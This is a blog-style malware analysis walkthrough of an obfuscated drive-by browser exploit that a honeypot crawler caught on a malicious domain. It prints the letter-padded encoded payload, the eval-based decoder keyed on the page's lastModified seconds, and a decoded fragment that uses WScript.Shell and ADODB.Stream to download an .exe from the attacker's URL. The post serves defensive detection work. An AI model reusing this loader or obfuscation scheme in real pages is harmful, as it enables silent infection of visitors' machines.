Malware Analysis Walking Tour

Part of my day job lately has been to build up a catalog of drive-by browser exploits and so I decided to put up some notes on the process. When I first started taking apart malware, the detailed examples I found online were invaluable, so I’m putting this up partly to try to give back and partly to try to make the whole process a little more accessible to the interested but not-quite-as-technical reader. Feel free to post a reply or contact me with questions or comments.

Getting Started

Sometimes finding a piece of malware to examine can be the first hurdle in doing any analysis. Here we have it pretty easy; we run a malware scanner that crawls the net with a swarm of unpatched virtual machines and monitors them to detect unusual behavior. When one of them exhibits symptoms of malware we can dump information about what happened to the machine, restore it from a snapshot, and send it back out to continue trawling.

Here we can see that the root page of nevpizdy-nenyznie50domain.in caused some suspect behavior on an unpatched XP/IE6 VM. Let’s take a look at what happened.

The static analysis came back clean. No real surprise there, since static analysis is a coarse-grained, best-effort approach; it picks up the obvious stuff, but it’s easy to fool. This exploit is going to be worth looking into, if for no other reason than that it will help us refine our static analysis detections.

Runtime (aka dynamic) analysis is where we’re really going to see stuff happen. Here we see a new process being executed from some binary file that shouldn’t be there; whatever the exploit is, the words “arbitrary code execution” are going to show up in the description.

I don’t know where that file came from at this point; best guess is that it’s being downloaded from some remote site rather than manufactured by logic on the page. We’ll see.

Time to get out of the GUI and get our hands dirty. Before I get to the code, a word of warning: don’t go visit these URLs. They’ve demonstrably owned a machine already, so unless you really want to know if it happens every time, you should probably keep your hands in your pockets on this one.

$ mkdir nevpizdy-nenyznie50domain.in
$ cd nevpizdy-nenyznie50domain.in/
$ touch notes
$ wgetasie http://nevpizdy-nenyznie50domain.in
$ chmod -w index.html
$ less index.html
<html><body><div style="display: none"><ul><li
id="khBsFxi">153n168Q161h150s167b156H162S161s83v118K162K160c163U159w152a167I152y91t92i61y174b61Q83Z83F83b83V166n152I167D135i156d160r152z162K168k167a91R90D159T162N150O148d167q156i162a161R97r155Z165K152Z153X83m112p83w85s148R149S162f168Z167W109O149C159N148O161N158y85p90e95B83I100s99P99m99i99y92M110z61q176l61K61P15
3J168w161F150G167p156X162Y161U83w122u162j91z148I92x61M174G61m83r83I83v83k169Y148h165T83W166u83T112N83g118d165c152p148a167i152w130P91F148U95k83C90P138U134C150Y165R156P163e167E97H134n155z152r159L159h90L92i110b61e83v83H83I83Y169x148j165G83t162y83M112O83j118O165d152D148Q167C152V130g91h148a95n83U90a116e119f130H119q1
[...]

Hmm, clearly some obfuscated exploit code, but doesn’t look like an encoding I’ve seen before. There’s a lot of that junk (full content in Appendix 1 of this pdf if you want to follow along), but what comes after is more immediately interesting (if horribly ugly):

 
<script>function zacabab (abeicd) { var terry = abeicd.split(':'); var merry = 'zxc'; return terry[2];};</script>
<script>
 var FhcL0z0 = new String(""); FhcL0z0 = document.getElementById("khBsFxi").innerHTML;
g6VZ13w8 = document.lastModified; k0miOe5c = zacabab(g6VZ13w8); FhcL0z0 =  FhcL0z0.replace(/[^0-9]/g,';');
function aXzLA9jbkkRMIW ( OzNL6t,em7lqjVq ) { var AYMQGuD7 = new String();var bsL1aXtpUc = new String();
 var mXhEn59Xi = OzNL6t.split(';'); for(euWM8 = 0;euWM8 < mXhEn59Xi.length-1;euWM8++)
 { AYMQGuD7 = String['f#ro!mC#ha@r^C&ode'.replace(/@|&|#|\^|\!|\(|\)/ig, '')](mXhEn59Xi[euWM8] - em7lqjVq);
bsL1aXtpUc = bsL1aXtpUc + AYMQGuD7;} return bsL1aXtpUc;}var vnfjqq = Date();LCEsM = aXzLA9jbkkRMIW(FhcL0z0,k0miOe5c);
var mXhEn59Xi = 'AYMQGuD7';function krasddk(zxc) {eval(zxc); return;};krasddk( LCEsM );</script>

This is the decoding part of the script (or a pretty-printed version in Appendix 2 of the pdf). So, there are two ways to do this right now: one is to carefully take this script apart and manually decode it piece by piece; the other is to let it do its thing in a JavaScript debugger and just grab whatever it decodes from memory. The latter is a lot faster.

Since this is a payload that targets Windows machines and I’m on a reduced-privilege account on a Linux machine, it’s reasonable to let this thing run. Just in case, I take a moment to switch Firefox to use Paros proxy so that if the script makes any requests I can record them and then drop them.

I open up Firebug on a blank page, set “Break on Next”, and then load the index.html that I pulled down with wget. When the page has finished rendering, I take a look at the DOM to see if anything jumps out at me; in this case, something does.

FhcL0z0 = "153;168;161;150;167;156;162;161;83;118;162;160;163;159;152;167;152;91;92;61;174;61;83;83;83;83;166;152;167;135;156;160;152;162;168;167;91;90;159;162;150;148;167;156;162;161;97;155;165;152;153;83;112;83;85;148;149;162;168;167;109;149;159;148;161;158;85;90;95;83;100;99;99;99;99;92;110;61;176;61;61;153;168;161[…]

So FhcL0z0 is now interesting. Where did it come from?

FhcL0z0 = document.getElementById("khBsFxi").innerHTML;
FhcL0z0 =  FhcL0z0.replace(/[^0-9]/g,';');

Remember the <li> that started out with “153n168Q161h150s167…”? It turns out that strange-looking “encoding” scheme was just sticking random letters between the sets of numbers. This is a case where reading the code could have turned up the info just as quickly as running the script: two methods, and both will usually work.
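For anyone who would rather poke at this outside the browser, here is a rough Python sketch of that same substitution. The function name split_filler is mine, not something from the page, and dropping empty pieces is a simplification of what the script's own loop does (it just stops one element short of the end).

```python
import re

def split_filler(raw: str) -> list:
    """Turn the letter-padded text from the <li> into a list of numbers."""
    # Same substitution as the page's replace(/[^0-9]/g, ';'):
    # every non-digit character becomes a separator.
    separated = re.sub(r"[^0-9]", ";", raw)
    # Simplification (my assumption): ignore empty pieces, such as the one
    # left behind by a trailing filler letter.
    return [int(piece) for piece in separated.split(";") if piece]

sample = "153n168Q161h150s167b156H162S161s"
print(split_filler(sample))
# → [153, 168, 161, 150, 167, 156, 162, 161]
```

The numbers line up with the start of what Firebug shows in FhcL0z0.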

The nice thing about running it is that there’s still lots of stuff in the DOM to look at. Back to Firebug:

LCEsM =function Complete()
{
    setTimeout('location.href = \"about:blank\"', 10000);
}
function Go(a)
{
    var s = CreateO(a, 'WScript.Shell');
    var o = CreateO(a, 'ADODB.Stream');
    var e = s.Environment('Process');
    var urltofile = 'http://nevpizdy-nenyznie50domain.in/feedback.php?page=1';
    var filename = 'hgivV.exe';
    var xhr = null;
    var bin = e.Item('TEMP') + '\\' + filename;
[...]

Hey, that’s nice. There’s only one layer of obfuscation going on here; once we get through the junk in FhcL0z0, it’s pretty readable (they even left the linebreaks in, how thoughtful). This is the code that actually performs the exploit; it gets executed via a gently-obfuscated eval() call at the end of the script tag: krasddk( LCEsM );
We don’t really need to know at this point, but it might be instructive to figure out where LCEsM came from.

LCEsM = aXzLA9jbkkRMIW(FhcL0z0,k0miOe5c);

Long story short, LCEsM is produced by decoding FhcL0z0 using a function and a key. The function is a simple for-loop that walks the input string and executes an obfuscated call to fromCharCode. The key is from

g6VZ13w8 = document.lastModified;
k0miOe5c = zacabab(g6VZ13w8);

The zacabab() function just splits the date at each “:” and returns the third piece, which for this timestamp format is the seconds field. Firebug tells me that the last modified date of the file is “12/28/2009 14:42:51” (and examining g6VZ13w8 and k0miOe5c confirms this); therefore the key needed to decode it is 51. A quick check verifies that we understand the encoding scheme.

$ python
>>> encoded = "153;168;161;150;167;156;162;161"
>>> "".join([chr(int(c) - 51) for c in encoded.split(";")])
'function'

As an aside, this is a perfect example of why DRM is ultimately a losing battle; if you provide someone with the ciphertext, the scrambling method, and the key, then you have provided them with everything they need to compromise your system. It works the same no matter if you’re a blackhat or a movie studio.

Back to the analysis: a quick bravo is in order for the folks behind wget. It correctly preserved the Last-Modified date while saving the page to the filesystem; without that, there would have been a lot more trial and error in figuring out the key. Thanks Hrvoje Niksic and Micah Cowan!

$ stat index.html
[...]
Modify: 2009-12-28 14:42:51.000000000 -0800
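Since the key is just the seconds field of that timestamp, it can also be pulled straight from the saved file. This is a minimal sketch, assuming the file still carries the modification time wget gave it; key_from_mtime is a name I made up for illustration.

```python
import os
import sys

def key_from_mtime(path: str) -> int:
    """Return the seconds field of a file's modification time."""
    # POSIX timestamps count exactly 60 seconds per minute, and time zone
    # offsets are whole minutes, so the seconds field is the same in any zone.
    return int(os.stat(path).st_mtime) % 60

if __name__ == "__main__" and len(sys.argv) > 1:
    # Usage (hypothetical script name): python key_from_mtime.py index.html
    print(key_from_mtime(sys.argv[1]))
```

If the file has been copied or edited since the download, the modification time (and therefore the key) will no longer match, which is one more reason for the chmod -w earlier.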

It seems that the detour to figure out how LCEsM was encoded was time well spent. We learned about an interesting obfuscation scheme (using lastModified) and learned that wget easily mitigates it. We can add this sort of information to static detections to correlate different exploits encoded by the same toolkit and do trending on related malware.
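As a starting point for that kind of static detection, here is a deliberately crude sketch of a heuristic. To be clear, this is not what our scanner does; the function name, the regular expressions, and the threshold of 20 number-letter pairs are all assumptions chosen for illustration, and a real rule would need tuning against false positives.

```python
import re

# A long run of "digits then one letter" pairs, like 153n168Q161h...
FILLER_RUN = re.compile(r"(?:\d{1,3}[A-Za-z]){20,}")
EVAL_CALL = re.compile(r"\beval\s*\(")

def looks_like_lastmodified_keyed(html: str) -> bool:
    """Flag pages that combine the three traits seen in this sample."""
    uses_key = "document.lastModified" in html    # key source
    uses_eval = EVAL_CALL.search(html) is not None  # payload execution
    has_payload = FILLER_RUN.search(html) is not None  # letter-padded numbers
    return uses_key and uses_eval and has_payload

payload = "153n168Q161h150s167b156H162S161s" * 3
page = ('<li id="x">' + payload + "</li>"
        "<script>k = document.lastModified; eval(x);</script>")
print(looks_like_lastmodified_keyed(page))                     # → True
print(looks_like_lastmodified_keyed("<html>hello</html>"))     # → False
```

Searching for the literal string fromCharCode would not work here, since the page builds that name at runtime, so the sketch keys on the traits the obfuscator can't easily hide.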

Next Time: The Exploit
